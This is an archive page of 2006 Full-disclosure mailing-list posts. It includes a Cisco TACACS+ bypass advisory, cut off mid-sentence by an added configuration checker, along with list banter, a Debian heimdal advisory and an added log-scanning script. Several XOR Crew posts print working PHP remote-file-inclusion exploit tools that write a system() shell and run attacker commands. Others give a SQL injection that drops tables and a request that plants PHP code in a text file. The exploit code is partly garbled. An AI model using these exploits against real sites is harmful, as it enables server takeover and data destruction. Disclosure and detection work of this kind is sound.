[Full-disclosure] Cisco Security Advisory: TACACS+ Authentication Bypass in Cisco Anomaly Detection and Mitigation Products

2006-02-15 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: TACACS+ Authentication Bypass in Cisco
Anomaly Detection and Mitigation Products

Document ID: 69073

Advisory ID: cisco-SA-20060215-guard-auth

http://www.cisco.com/warp/public/707/cisco-sa-20060215-guard.shtml

Revision 1.0


Last Updated 2006 February 15 1600 UTC (GMT)

For Public Release 2006 February 15 1600 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
=======

A vulnerability in versions 5.0(1) and 5.0(3) of the software used in
Cisco Anomaly Detection and Mitigation appliances and service modules
may allow unauthorized users to get unauthorized access to the
devices and/or escalate their privileges if Terminal Access
Controller Access Control System Plus (TACACS+) is incompletely
configured.

TACACS+ authentication is disabled by default, and a device correctly
configured for TACACS+ authentication is not affected by this
vulnerability.

Cisco has made free software available to address this vulnerability
for affected customers. There are workarounds available to mitigate
the effects of the vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060215-guard.shtml .

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects versions 5.0(1) and 5.0(3) of the software
for the Cisco Guard and Cisco Traffic Anomaly Detector appliances and
the Anomaly Guard Module and Traffic Anomaly Detector Module for the
Cisco Catalyst 6500 switches/Cisco 7600 routers if the devices are
incompletely configured to use TACACS+ authentication. Please note
that 5.0(2) was never released to cisco.com, which is the reason it
is not listed as an affected release.

Devices running an affected software version and configured for
TACACS+ authentication are vulnerable if the Authentication,
Authorization, and Accounting (AAA) command specifies TACACS+
authentication but the configuration lacks the tacacs-server host
command that specifies the TACACS+ server. In other words, if the
configuration includes either or both of the following commands:

    aaa authentication login tacacs+ local
    aaa authentication enable tacacs+ local


but not the following command:

    tacacs-server host <IP address of TACACS+ server>


the device is vulnerable.

Note:  The local authentication method specified after the
tacacs+ authentication method in the aaa authentication commands
above is unrelated to the vulnerability. This authentication method
is shown because it is normally used as a fallback in case the
TACACS+ server is not available. Devices may be vulnerable, with or
without a local authentication method, if the tacacs+
authentication method is used before the local method (if
specified) and the configuration lacks the tacacs-server host
command.

Products Confirmed Not Vulnerable
+--------------------------------

The Cisco Guard and Cisco Traffic Anomaly Detector are not affected
by this vulnerability if they are running the following software
versions:

  * Versions of the Cisco Guard and Cisco Traffic Anomaly Detector
software prior to 5.0. This includes any 3.x and 4.x release.
  * Cisco Guard and Cisco Traffic Anomaly Detector software version
5.1 and above.

A Cisco Guard or Cisco Traffic Anomaly Detector running version 5.0
(1) or 5.0(3) is not affected if the device is not configured to
authenticate users against a TACACS+ server, or if its TACACS+
configuration is complete, i.e. if the tacacs-server host command is
present in the configuration.

Note:  TACACS+ authentication is disabled by default. If no explicit
AAA configuration takes place the Cisco Guard and the Cisco Traffic
Anomaly Detector will authenticate users against the local database
(the local authentication method.)

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

The Cisco Guard and Cisco Traffic Anomaly Detector appliances and the
Anomaly Guard Module and Traffic Anomaly Detector Module for the
Cisco Catalyst 6500 switches/Cisco 7600 routers are Distributed
Denial of Service (DDoS) attack mitigation devices that detect the
presence of a potential DDoS attack and divert attack traffic
destined for the network being monitored without affecting the flow
of legitimate traffic.

The Cisco Guard and the Cisco Anomaly Traffic Detector appliances can
be managed via a virtual terminal (standard keyboard and monitor
attached directly to the appliance), a local serial console, remote
Secure Shell (SSH) connections, and/or remote secure web
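
The condition from the "Vulnerable Products" section of the advisory above, written as a configuration check. This is an added example, not Cisco's code: the function names, the sample configurations and passing the release in as a string such as "5.0(3)" are assumptions, and only the three commands quoted in the advisory are recognised.

```python
import re

AFFECTED_VERSIONS = {"5.0(1)", "5.0(3)"}    # releases the advisory names

AAA_LINE = re.compile(r"^\s*aaa\s+authentication\s+(login|enable)\s+(.+?)\s*$", re.I)
TACACS_HOST = re.compile(r"^\s*tacacs-server\s+host\s+\S+", re.I)

# Constructed sample configurations (not captured from a device).
INCOMPLETE = (
    "aaa authentication login tacacs+ local\n"
    "aaa authentication enable tacacs+ local\n"
)
COMPLETE = INCOMPLETE + "tacacs-server host 192.0.2.10\n"   # documentation address
TACACS_ONLY = "aaa authentication login tacacs+\n"
LOCAL_FIRST = "aaa authentication login local tacacs+\n"


def tacacs_before_local(methods):
    """True when tacacs+ is listed and no local method precedes it."""
    if "tacacs+" not in methods:
        return False
    return "local" not in methods or methods.index("tacacs+") < methods.index("local")


def audit(config_text, version):
    """Apply the advisory's condition to one device configuration.

    version is the software release in the advisory's notation, e.g. "5.0(3)";
    how it is read from the device is outside this example.
    """
    contexts = set()
    has_host = False
    for line in config_text.splitlines():
        if TACACS_HOST.match(line):
            has_host = True
            continue
        match = AAA_LINE.match(line)
        if match and tacacs_before_local(match.group(2).lower().split()):
            contexts.add(match.group(1).lower())
    incomplete = bool(contexts) and not has_host
    affected = version in AFFECTED_VERSIONS
    return {
        "tacacs_first": sorted(contexts),       # login and/or enable
        "has_tacacs_server_host": has_host,
        "incomplete_tacacs": incomplete,        # worth fixing on any release
        "affected_version": affected,
        "vulnerable": incomplete and affected,
    }


if __name__ == "__main__":
    for name, text in [("incomplete", INCOMPLETE), ("complete", COMPLETE),
                       ("tacacs only", TACACS_ONLY), ("local first", LOCAL_FIRST)]:
        print(name, audit(text, "5.0(3)"))
```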

Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Stan Bubrouski
On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
> $50,000 for reporting BSA that your neighbor uses an illegal version of
> Window$ !

That is entirely inaccurate.  The $5 reward with numerous strings
attached is for reporting a company using multiple pirated copies of
software, reporting your neighbor+ apparently yields no reward other
than flaming crap on your doorstep and RAT written on your windows :-P

-sb

> https://reporting.bsa.org/usa/home.aspx


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Michael Holstein

Yeah, if Grandma next door gets hit with a $1,000,000 judgment.

https://reporting.bsa.org/usa/rewardsconditions.aspx

That's only 5%. The lawyers at the BSA probably take 40%.

/mike.

Jerome Athias wrote:

> $50,000 for reporting BSA that your neighbor uses an illegal version of
> Window$ !
>
> https://reporting.bsa.org/usa/home.aspx


[Full-disclosure] Re: Re: Fun with Foundstone

2006-02-15 Thread Dave Korn
[EMAIL PROTECTED] wrote:
> what LOL ? what is surprising ?


  Not 'lol surprising', just 'lol amusing'.  I'm a happy guy, I laugh a lot, 
and don't need much of a reason to!

  And two hours is a fairly fast reaction time to notice a post on one of 
(presumably) many lists that they subscribe to and take the vulnerable page 
offline.  I thought that was good.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





[Full-disclosure] Re: Re: Fun with Foundstone

2006-02-15 Thread Dave Korn
Debasis Mohanty wrote:
> Does this mean, Dave's age is in between 3 - 4 yrs ?? =)
>
> - D


  :-)  That's so much more flattering than when people mistake me for the 
grey-haired man in his 60's who used to work for AT+T!

  Say, Deb, next time people ask me if I wrote the Korn Shell, can I quote 
your post to them?

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread [EMAIL PROTECTED]
nop totally wrong, I got 50k yesterday reporting my sister ..

;D
Stan Bubrouski wrote:
> On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
>> $50,000 for reporting BSA that your neighbor uses an illegal version of
>> Window$ !
>
> That is entirely inaccurate.  The $5 reward with numerous strings
> attached is for reporting a company using multiple pirated copies of
> software, reporting your neighbor+ apparently yields no reward other
> than flaming crap on your doorstep and RAT written on your windows :-P
>
> -sb
>
>> https://reporting.bsa.org/usa/home.aspx


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread str0ke
Class,

I just made 50k reporting you ;)

/str0ke

On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> nop totally wrong, I got 50k yesterday reporting my sister ..
>
> ;D
> Stan Bubrouski wrote:
>> On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
>>> $50,000 for reporting BSA that your neighbor uses an illegal version of
>>> Window$ !
>>
>> That is entirely inaccurate.  The $5 reward with numerous strings
>> attached is for reporting a company using multiple pirated copies of
>> software, reporting your neighbor+ apparently yields no reward other
>> than flaming crap on your doorstep and RAT written on your windows :-P
>>
>> -sb
>>
>>> https://reporting.bsa.org/usa/home.aspx


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Stan Bubrouski
haha wish you had I could sue you ;-)

-sb

On 2/15/06, str0ke [EMAIL PROTECTED] wrote:
> Class,
>
> I just made 50k reporting you ;)
>
> /str0ke
>
> On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
>> nop totally wrong, I got 50k yesterday reporting my sister ..
>>
>> ;D
>> Stan Bubrouski wrote:
>>> On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
>>>> $50,000 for reporting BSA that your neighbor uses an illegal version of
>>>> Window$ !
>>>
>>> That is entirely inaccurate.  The $5 reward with numerous strings
>>> attached is for reporting a company using multiple pirated copies of
>>> software, reporting your neighbor+ apparently yields no reward other
>>> than flaming crap on your doorstep and RAT written on your windows :-P
>>>
>>> -sb
>>>
>>>> https://reporting.bsa.org/usa/home.aspx


[Full-disclosure] Re: What can a Remote Vulnerability Scanner do in Future?

2006-02-15 Thread Aaron
Nessus can do local checks on windows/unix from remote. 
nessus.org.


Don't let the good looking web site scare you either.  It
is still free afaik.


:)

--Aaron


On Mon, 13 Feb 2006 10:16:22 +1100 (EST)
 Tim Nelson [EMAIL PROTECTED] wrote:

On Mon, 6 Feb 2006, Alice Bryson wrote:

...
   Eeye scanner could not do remote local check too. So 
I am consider
what can Remote Vulnerability Scanner do? Will this 
thing disappear in

the future?


	Scan for remote vulnerabilities.  Scanning for local 
vulnerabilities can obviously only be done locally.


	Basically you need to have a remote access method 
before you can 
do anything remotely.  It might be useful to get a 
windows version of sshd or cfengine.  Another possibility 
would be to make the local scanner executable available 
on the network, and then have each machine individually 
download it and run it locally.


	Basically, to check for local vulnerabilities, you 
need:

1.  A deployment process (hopefully simple)
2.  An execution process

	This is exactly what cfengine was designed to solve in 
the Unix 
world.


--
Kind Regards,
 
Tim Nelson
Server Administrator
 
P: 03 9934 0888
F: 03 9934 0899
E: [EMAIL PROTECTED]
W: www.webalive.biz
 
WebAlive Technologies
Level 1, Innovation Building
Digital Harbour
1010 La Trobe Street
Docklands Melbourne VIC 3008



[Full-disclosure] iUser Ecommerce - Remote Command Execution Vulnerability

2006-02-15 Thread Scott Dewey
===
XOR Crew :: Security Advisory 1/10/2006
===
iUser Ecommerce - Remote Command Execution Vulnerability
===
http://www.xorcrew.net/
===

:: Summary

  Vendor       :  Intensive Point
  Vendor Site  :  http://www.intensivepoint.com/
  Product(s)   :  iUser Ecommerce - shopping cart for digital products
  Version(s)   :  All
  Severity     :  Medium/High
  Impact       :  Remote Command Execution
  Release Date :  1/10/2006
  Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===

I. Description

The iUser digital products shopping cart system has a broad range of features, giving
you an incredible amount of flexibility, while remaining secure, easy to implement and
administer. There is simply no other comparable shopping cart solution specializing in
software downloads distribution available on the market at this price!

===

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution
in the common.php file.  The bug is here on lines 28, 29, and 32:

// Load iuser configuration files
@require($include_path . "setup.php");
@require($include_path . "config.php");

// Load misc functions
require($include_path . "util.php");

the $include_path variable is not set prior to being used in the require() function.
The vendor has been contacted and the issue has been resolved.

===

Exploit code:

-BEGIN-
?php
/*
iUser Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
*/
$cmd = $_POST[cmd];
$turl = $_POST[turl];
$hurl = $_POST[hurl];
$form= form method=\post\ action=""> 
.turl:brinput type=\text\ name=\turl\ size=\90\ value=\.$turl.\br
.hurl:brinput type=\text\ name=\hurl\ size=\90\ value=\.$hurl.\br
.cmd:brinput type=\text\ name=\cmd\ size=\90\ value=\.$cmd.\br
.input type=\submit\ value=\Submit\ name=\submit\
./formHR WIDTH=\650\ ALIGN=\LEFT\;
if (!isset($_POST['submit'])) 
{
echo $form;
}else{
$file = fopen (test.txt, w+);
fwrite($file, ?php system(\.$cmd.\); ?);
fclose($file);
$file = fopen ($turl.$hurl, r);
if (!$file) {
echo pUnable to get output.\n;
exit;
}
echo $form;
while (!feof ($file)) {
 $line = fgets ($file, 1024);
echo $line.br;
}
}
?
--END--

===

IV. Greets :

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

===

[Full-disclosure] Web Calendar Pro - Denial of Service SQL Injection Vulnerability

2006-02-15 Thread Scott Dewey
===
XOR Crew :: Security Advisory 1/12/2006
===
Web Calendar Pro - Denial of Service SQL injection (lame)
===
http://www.xorcrew.net/
===

:: Summary

  Vendor       :  MitriDAT
  Vendor Site  :  http://www.web-calendar-pro.com/
  Product(s)   :  Web Calendar Pro
  Version(s)   :  All
  Severity     :  Low/Medium
  Impact       :  Denial of Service
  Release Date :  1/12/2006
  Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===

I. Description

Web Calendar Pro is a powerful yet easy to use multi-language calendar system for
your website or your personal planning needs. This product can support unlimited
amount of web calendars, each of those can have its own settings. With Web Calendar
Pro you could handle a big public schedule for publishing events on your site, with
several users granted different rights for managing this calendar events and unlimited
amount of subscribers, private calendar for managing your own tasks, or just a mini
calendar to add more interactivity to your web site.

===

II. Synopsis

There is an unsanitized $tabls variable that allows for SQL injection into the DROP
query from the dropbase.php file.  This causes the script to become un-operational
until the table has been fixed or until the application has been reinstalled.  The vendor
has been made aware of this situation and has fixed the issue.  Please upgrade to the
latest version.

Example:

http://www.site.com/pathtocalendar/dropbase.php?tabls=
' or 1=1 --

===

IV. Greets :

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

===

[Full-disclosure] HostAdmin - Remote Command Execution Vulnerability

2006-02-15 Thread Scott Dewey
===
XOR Crew :: Security Advisory 2/11/2006
===
HostAdmin - Remote Command Execution Vulnerability
===
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
===

:: Summary

  Vendor       :  DreamCost
  Vendor Site  :  http://www.dreamcost.com/
  Product(s)   :  HostAdmin - Automated Hosting Suite
  Version(s)   :  All
  Severity     :  Medium/High
  Impact       :  Remote Command Execution
  Release Date :  2/11/2006
  Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===

I. Description

By creating a product that integrates with the major payment processors, registrars,
and provisioning tools on the market, HostAdmin gives your hosting company the power
to bill and activate hosting accounts in real-time, even while you sleep at night!

===

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution
in the index.php file.  The bug is here on lines 5, 6, and 7:

require("setup.php");
require("functions.php");
require("db.conf");
require($path . "que.php");
require($path . "provisioning_manager.php");
require($path . "registrar_manager.php");

the $path variable is not set prior to being used in the require() function.
The vendor is no longer offering updates for this software.

===

Exploit code:

-BEGIN-
?php
/*
HostAdmin Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
*/
$cmd = $_POST[cmd];
$turl = $_POST[turl];
$hurl = $_POST[hurl];
$form= form method=\post\ action=""
.turl:brinput type=\text\ name=\turl\ size=\90\ value=\.$turl.\br
.hurl:brinput type=\text\ name=\hurl\ size=\90\ value=\.$hurl.\br
.cmd:brinput type=\text\ name=\cmd\ size=\90\ value=\.$cmd.\br
.input type=\submit\ value=\Submit\ name=\submit\
./formHR WIDTH=\650\ ALIGN=\LEFT\;
if (!isset($_POST['submit'])) {
echo $form;
}else{
$file = fopen (test.txt, w+);
fwrite($file, ?php system(\echo ++BEGIN++\); system(\.$cmd.\); system(\echo ++END++\); ?);
fclose($file);
$file = fopen ($turl.$hurl, r);
if (!$file) {
echo pUnable to get output.\n;
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024).br;
}
$tpos1 = strpos($line, ++BEGIN++);
$tpos2 = strpos($line, ++END++);
$tpos1 = $tpos1+strlen(++BEGIN++);
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?
--END--

===

IV. Greets :

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

===


[Full-disclosure] Wimpy MP3 Player - Text file overwrite vulnerability

2006-02-15 Thread Scott Dewey
===
XOR Crew :: Security Advisory 2/10/2006
===
Wimpy MP3 Player - Text file overwrite. (lame)
===
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN/
===

:: Summary

  Vendor       :  Plaino Inc.
  Vendor Site  :  http://www.wimpyplayer.com/
  Product(s)   :  Wimpy MP3 Player
  Version(s)   :  All
  Severity     :  Low
  Impact       :  trackme.txt overwrite
  Release Date :  2/10/2006
  Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===

I. Description

Wimpy provides a simple, clean, enjoyable listening experience for your website's
visitors.  Lists and plays an entire directory full of mp3 files automatically.

===

II. Synopsis

The file wimpy_trackplays.php does not check the variables passed to it prior to
writing the contents of those variables to trackme.txt.  That allows us to write
anything we want to trackme.txt.  This is not really a problem for the server running
wimpy.  The problem lies in the fact that being able to write to trackme.txt allows
the attacker a jump off point for other Remote Command Execution Bugs that read from
text files.  These bugs are quite common and thus wimpy aids the attacker in staying
anonymous.

Example:

http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays
trackFile=?phptrackArtist=system(uname -a;id;);trackTitle=?

that writes:

?phpsystem(uname -a;id;);?

to trackme.txt.  Then all the attacker has to do is point his RCE exploit to
trackme.txt and there you have it.  So yeah lame vuln but interesting.  Peace out.

===

IV. Greets :

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

===
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
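
A detection sketch for the four XOR Crew advisories above (iUser, Web Calendar Pro, HostAdmin, Wimpy), added here as an example and not taken from any of the posts: it scans a web access log for the request shapes those advisories describe. The script and parameter names come from the advisories; the Apache combined log format, the sample lines, the assumed shape of a legitimate `tabls` value and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter names are from the advisories; everything else is assumed.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
SCHEME_RE = re.compile(r"\s*[a-z][a-z0-9+.\-]*://", re.I)  # value is a URL, not a local path
TABLE_LIST_RE = re.compile(r"[A-Za-z0-9_,]*")  # assumed shape of a legitimate tabls value
INCLUDE_PARAMS = {"common.php": "include_path", "index.php": "path"}
WIMPY_PARAMS = {"trackFile", "trackArtist", "trackTitle"}

SAMPLE_LOG = [  # constructed lines, documentation addresses only
    '192.0.2.10 - - [15/Feb/2006:10:00:01 +0000] "GET /shop/common.php?include_path=http://198.51.100.7/ HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [15/Feb/2006:10:00:02 +0000] "GET /cal/dropbase.php?tabls=%27%20or%201=1%20-- HTTP/1.1" 200 90 "-" "-"',
    '192.0.2.12 - - [15/Feb/2006:10:00:03 +0000] "GET /wimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=%253C%253Fphp&trackTitle=%3F%3E HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.13 - - [15/Feb/2006:10:00:04 +0000] "GET /shop/common.php?include_path=lib/ HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.14 - - [15/Feb/2006:10:00:05 +0000] "GET /cal/dropbase.php?tabls=events,users HTTP/1.1" 200 33 "-" "-"',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so that %253C%253F is seen as '<?'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        if INCLUDE_PARAMS.get(script) == name:
            # The include prefix should never arrive from the client as a URL.
            if SCHEME_RE.match(value):
                findings.append("remote-include:" + name)
        elif script == "dropbase.php" and name == "tabls":
            # Anything beyond identifiers and commas can alter the DROP query.
            if not TABLE_LIST_RE.fullmatch(value):
                findings.append("sql-metachar:tabls")
        elif script == "wimpy_trackplays.php" and name in WIMPY_PARAMS:
            # PHP open/close tags being written into trackme.txt.
            if "<?" in value or "?>" in value:
                findings.append("php-tag-write:" + name)
    return findings


def scan(lines):
    """Return (client, status, finding) for every suspicious access-log line."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match:
            client, target, status = match.groups()
            hits.extend((client, int(status), f) for f in classify(target))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so the same parameters sent in a POST body or cookie are invisible to this check; a hit is a lead to investigate, not proof of compromise.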

Re: [Full-disclosure] Internet Explorer dragdrop 0day

2006-02-15 Thread Markus

Hi Thierry,

I think I understand now. You did it for the `shock` effect.
I guess it is nothing more than a matter of opinion.
( I mean this to be nothing more than...
a free bit of market research I suppose. )
My opinion being that; most users would find it an invasive and
deceptive tactic.
e.g.
 If a company was found to have released a successful virus campaign
 and their product was the only protection against it.
 I wouldn't purchase that product.

Or the far more ridiculous:
 The door to door salesman who pours cranberry juice on the old lady's
 carpet doesn't get the chance to prove how well the vacuum cleaner works.

This is hardly worth reading so I'm going to stop writing it.

Good luck Thierry.

Markus

--


Dear Markus,

M under the heading  Do you have a demonstration ?, both links to the
M demo exploit are dead.
Yes they are, I was too lazy to remove them. I will replace them with
some working PoC heise.de links.

M I assume in an attempt to hide the target url you meant to use the
M * onclick * javascript event, or even the * onmousedown * or * onmouseup *,
M but surely not the * onmouseover * !
No I used on mouse over. The exploit was a PoC nothing more, I think
to recall it launched calc.exe or similar (google for shreddersub7)

M You are aware that your current chosen method would have launched your
M exploit on the machine of a prospective customer,
The links are supposed to do so.

M Please give your web designer a whack on the side of the head though.
That would be me ouch! that hurt.

I know I need a redesign for sake of usability.

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



RE: [Full-disclosure] Re: Re: Fun with Foundstone

2006-02-15 Thread Debasis Mohanty
Sure !! With the credits intact ;o)

- Deb
 
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave Korn
Sent: Thursday, February 16, 2006 12:46 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Re: Re: Fun with Foundstone

Debasis Mohanty wrote:
 Does this mean, Dave's age is in between 3 - 4 yrs ?? =)

 - D


  :-)  That's so much more flattering than when people mistake me for the
grey-haired man in his 60's who used to work for AT+T!

  Say, Deb, next time people ask me if I wrote the Korn Shell, can I quote
your post to them?

cheers,
  DaveK
--
Can't think of a witty .sigline today 





[Full-disclosure] Kyocera Network Printers

2006-02-15 Thread evader




Hi,

Please see the link below for an example of compromising Kyocera Network Printers.

http://evader.wordpress.com/2006/02/16/kyocera-printers/

Hope someone finds this useful.





[Full-disclosure] What is the state of vulnerability research?

2006-02-15 Thread Steven M. Christey

This is a series of open questions to people who consider themselves
to be vulnerability researchers.  Hopefully this will open a number of
fruitful public discussions.

1) What is the state of vulnerability research?

2) What have researchers accomplished so far?

3) What are the greatest challenges that researchers face?

4) What, if anything, could researchers accomplish collectively that
   they have not been able to accomplish as individuals?

5) Should the ultimate goal of research be to improve computer
   security overall?

6) What is an elite researcher?  Who are the elite researchers?

7) Who are the researchers who do not get as much recognition as they
   deserve?


Why am I asking?

Because I don't think this topic has been covered quite in this
fashion, and it's about time it did.

Feel free to respond to me privately.  If I receive more than a couple
responses, I will post a summary.

Thanks to James Bercegay, KF, Luigi Auriemma, Matthew Murphy, and Kurt
Seifried for beta-testing the first 5 questions by providing a variety
of responses :)

- Steve


P.S.  If you're further interested in letting your voice be heard,
check out Richard Forno's disclosure survey at
http://www.infowarrior.org/survey.html


[Full-disclosure] [SECURITY] [DSA 977-1] New heimdal packages fix several vulnerabilities

2006-02-15 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 977-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 16th, 2006 http://www.debian.org/security/faq
- --

Package        : heimdal
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-0582 CVE-2006-0677
CERT advisory  : 
BugTraq ID     : 
Debian Bug     : 

Two vulnerabilities have been discovered in heimdal, a free
implementation of Kerberos 5.  The Common Vulnerabilities and
Exposures project identifies the following vulnerabilities:

CVE-2006-0582

Privilege escalation in the rsh server allows an authenticated
attacker to overwrite arbitrary files and gain ownership of them.

CVE-2006-0677

A remote attacker could force the telnet server to crash before
the user logged in, resulting in inetd turning telnetd off because
it forked too fast.

The old stable distribution (woody) does not expose rsh and telnet servers.

For the stable distribution (sarge) these problems have been fixed in
version 0.6.3-10sarge2.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your heimdal packages.


Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  AMD64 architecture: